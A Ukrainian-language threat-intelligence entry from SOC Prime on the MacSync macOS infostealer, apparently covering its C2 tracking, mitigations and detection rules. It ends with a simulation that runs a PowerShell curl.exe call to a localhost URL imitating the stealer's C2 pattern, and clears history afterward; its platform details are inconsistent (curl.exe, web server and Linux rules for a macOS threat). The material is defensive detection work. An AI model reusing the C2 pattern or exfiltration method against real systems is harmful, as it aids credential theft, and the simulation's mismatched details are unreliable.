SOC Prime Bias: High

20 Aug 2026 07:15 UTC

Відстеження інфраструктури MacSync Stealer за допомогою поведінкового аналізу

Author Photo
SOC Prime Team linkedin icon Стежити
Відстеження інфраструктури MacSync Stealer за допомогою поведінкового аналізу
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

MacSync Stealer — це крадіжник інформації, націлений на macOS, який покладається на швидке змінювання інфраструктури командування та контролю. Шкідливе програмне забезпечення націлене на цінні дані, включаючи вміст Keychain macOS, облікові дані браузера, ключі SSH і облікові дані хмари. Його ланцюг атак на основі скриптів поєднує соціальну інженерію, отримання корисного навантаження через curl, і сегментоване вивезення даних за допомогою HTTP PUT запитів.

Розслідування

Експерти Microsoft Defender виявили загрозу, зіставивши регулярні дії на кінцевих точках і в мережі замість використання статичних індикаторів доменів. Розслідування з’єднало понад 30 доменів, зосереджуючись на сталих поведінкових поворотах, таких як специфічні URI-шляхи, User-Agent рядки macOS та характерні параметри завантаження. Цей підхід дозволив дослідникам простежити активність від початкового отримання корисного навантаження до підготовки даних і фінального вивезення.

Пом’якшення

Організаціям слід знизити ризик ініційованого користувачем виконання в Terminal за допомогою обізнаності про безпеку та платформних контролів, які обмежують підозрілі робочі процеси пастування та виконання. Захист сховищ облікових даних, таких як Keychain macOS та профілі браузера від несанкціонованого доступу, є критично важливим. Моніторинг підозрілих комбінацій утиліт macOS і незвичайних HTTP PUT завантажень також може допомогти виявити активне вивезення даних.

Відповідь

Якщо виявлено активність MacSync Stealer, відповідальні повинні зіставити підозріле виконання shell і AppleScript з вихідними телеметричними даними мережі. Слідчі повинні перевірити створення архівів у тимчасових місцях, таких як /tmp/ та ідентифікувати несанкціонований доступ до конфіденційних файлів. Активність в мережі також повинна бути переглянута на наявність curl запитів, що містять ідентифікатори завантаження, такі як upload_id, chunk_index, і total_chunks.

Потік атаки

Ми досі оновлюємо цю частину.

Виявлення

Спроба підозрілої виконання Curl [MacOS] (через cmdline)

Команда SOC Prime
19 серпня 2026

Архів був створений у тимчасовій папці macOS (через file_event)

Команда SOC Prime
19 серпня 2026

Виявлення C2 MacSync Stealer і шаблонів вивезення даних [Webserver]

Правила SOC Prime AI
19 серпня 2026

Виявлення спочатку завантаженого корисного навантаження MacSync Stealer і виконання AppleScript [Linux Process Creation]

Правила SOC Prime AI
19 серпня 2026

Виконання симуляції

Передумова: перевірка телеметрії та базової лінії перед початком має бути пройдена.

Пояснення: цей розділ описує точне виконання техніки противника (TTP), призначеної для виклику правила виявлення. Команди та наратив повинні прямо відображати виявлені TTP і спрямовані на створення точної телеметрії, очікуваної за логікою виявлення. Абстрактні або не пов’язані приклади призведуть до помилкового діагнозу.

  • Наратив атаки та команди: Зловмисник успішно розгорнув MacSync Stealer на цільовому веб-сервері. Зібравши облікові дані та конфіденційну інформацію системи, зловмисник тепер прагне вивести ці дані на свій сервер командування та контролю (C2). Щоб злитись зі стандартним трафіком адміністрування і уникнути виявлення простими інструментами на основі підписів, зловмисник використовує curl.exe щоб надіслати викрадені дані. Вони додають специфічні шкідливі параметри URI /dynamic?txd= до запиту, що є відомою сигнатурою інфраструктури MacSync C2.

  • Сценарій регресійного тестування:

    # Сценарій моделювання для виклику правила виявлення MacSync Stealer C2
    # Ця команда використовує curl для звернення до змодельованого C2-прапора з шкідливим шаблоном URI.
    
    $target_url = "http://127.0.0.1/dynamic?txd=malicious_payload_data"
    Write-Host "Імітація комунікації MacSync Stealer C2..."
    curl.exe $target_url
  • Команди очищення:

    # Ніякі постійні файли не створюються цією симуляцією; 
    # однак, очищення локальної історії, якщо це необхідно.
    Clear-History